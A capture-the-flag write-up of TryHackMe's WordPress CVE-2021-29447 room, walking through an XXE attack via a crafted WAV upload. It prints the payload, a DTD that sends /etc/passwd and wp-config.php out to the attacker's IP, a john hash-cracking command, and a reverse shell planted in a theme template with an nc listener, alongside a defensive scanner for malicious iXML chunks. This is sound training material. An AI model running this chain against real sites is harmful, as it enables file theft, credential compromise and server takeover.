THM - Wordpress: CVE-2021-29447

Hi everyone,

today we look at the Wordpress: CVE-2021-29447 room on TryHackMe.

An XXE vulnerability is an injection that takes advantage of a poorly configured XML parser. It lets an attacker include external entities, enabling attacks on applications that parse XML supplied in their parameters. We'll explore a recent XXE vulnerability, albeit one that comes with some situational caveats.

Researchers at security firm SonarSource discovered an XML external entity injection (XXE) security flaw in the WordPress Media Library. The vulnerability can be exploited only when this CMS runs in PHP 8 and the attacking user has permissions to upload media files. Take note of the latter condition as we walk through an example of exploiting this vulnerability below.

Impact

  • Arbitrary File Disclosure: The contents of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
  • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

CVE description from cve.mitre.org:

Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.

We start

After a bit of googling and reading the room's "introduction" section, we know we will need two files:

  • a wav file to upload to WordPress.
  • a dtd file, served from our machine, that will trigger a callback to our terminal.

Let's get them ready:

Wav file:

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.11.16.30:4444/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > evilsound.wav

Dtd file:

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.11.16.30:4444/?p=%file;'>" >

At the end of the first line we put "resource=/etc/passwd" to verify that everything works.
Once verified, we will change it to answer the room's second question: Based on the results of #1, what is the name of the database for WordPress?
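Seen from the defender's side, the file built above is just a RIFF container whose iXML chunk carries XML with a DOCTYPE and an external parameter entity, and that is something an upload scanner can check before the media library ever hands the chunk to an XML parser. The following Python is an added example, not part of the room or of this writeup: the chunk walker, the fixture WAV files it builds and the placeholder DTD host are my own construction.

```python
import re
import struct

# Constructed fixtures: an iXML payload of the same shape as the one built above,
# pointing at a placeholder DTD host, and a harmless iXML metadata block.
XXE_XML = (b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
           b'"http://dtd-host.invalid/evil.dtd">%remote;]>')
BENIGN_XML = b'<?xml version="1.0"?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>'

# Markup that recorder-generated iXML metadata never needs: a DOCTYPE, entity
# declarations, or SYSTEM/PUBLIC identifiers that pull in external resources.
SUSPICIOUS = re.compile(rb'<!DOCTYPE|<!ENTITY|\bSYSTEM\b|\bPUBLIC\b', re.IGNORECASE)


def build_wav(ixml: bytes) -> bytes:
    """Assemble a RIFF/WAVE container holding one iXML chunk (no audio data)."""
    pad = b'\x00' if len(ixml) % 2 else b''          # chunks are word-aligned
    chunk = b'iXML' + struct.pack('<I', len(ixml)) + ixml + pad
    body = b'WAVE' + chunk
    return b'RIFF' + struct.pack('<I', len(body)) + body


def iter_chunks(data: bytes):
    """Yield (fourcc, payload) for each chunk in a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b'RIFF' or data[8:12] != b'WAVE':
        raise ValueError('not a RIFF/WAVE file')
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack('<I', data[pos + 4:pos + 8])
        yield fourcc, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)                   # skip the pad byte if any


def find_xxe_markers(data: bytes) -> list:
    """Return the suspicious tokens found in iXML chunks; an empty list means clean."""
    hits = []
    for fourcc, payload in iter_chunks(data):
        if fourcc == b'iXML':
            hits.extend(m.group(0) for m in SUSPICIOUS.finditer(payload))
    return hits


if __name__ == '__main__':
    for label, xml in (('xxe', XXE_XML), ('benign', BENIGN_XML)):
        print(label, find_xxe_markers(build_wav(xml)))
```

The same walk applies to any other text-bearing chunk a parser might feed to libxml; only the fourcc in `find_xxe_markers` changes.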

OK, let's go: log in to WordPress with the credentials provided in the introduction:
user: test-corp
password: test
then we upload the wav file and start the web server via PHP with the command:

php -S 0.0.0.0:4444

As soon as we upload the wav file, our terminal gets a response similar to this:

Now we follow the suggestion of the introduction section to decode the answer:

So let's create a php file containing this:

<?php echo zlib_decode(base64_decode('base64here')); ?>

and the server responds like this:

OK, it works! We can read the /etc/passwd file.
Now, to answer the room's questions, we replace /etc/passwd in evil.dtd with /var/www/html/wp-config.php.
This is because the server is running on Ubuntu, and we need to read the WordPress settings file to answer questions 3 and 4.
Let's try:

Well, let's move on to the next questions:
they ask which DBMS WordPress uses, its version, and the port it listens on.
To answer, we connect to the DB with the credentials found in wp-config.php:

Great! On to the next question!
We use john and rockyou.txt to crack the password hash:

john --format:phpass hashWP --wordlist:/usr/share/wordlists/rockyou.txt

OK, now we have the password of another WordPress user, presumably with administrator privileges. Let's try to log in with the new credentials:

We're in!

Only the last question is left:
Compromise the machine and locate flag.txt.
So: get a reverse shell and access the server.

We generate a PentestMonkey PHP reverse shell using the site reverse.7sec.pw.

Now we go to Appearance --> Theme Editor, switch the theme to Twenty Nineteen and select the 404 Template page.
We delete its contents, paste the reverse shell and save.

After saving, from the terminal run the listener through rlwrap with the command:

rlwrap -cAr nc -lvnp 4445

and open the WordPress page:

http://10.10.233.178/wp-content/themes/twentynineteen/404.php

Let's look around and find the flag!

thanks, TryHackMe!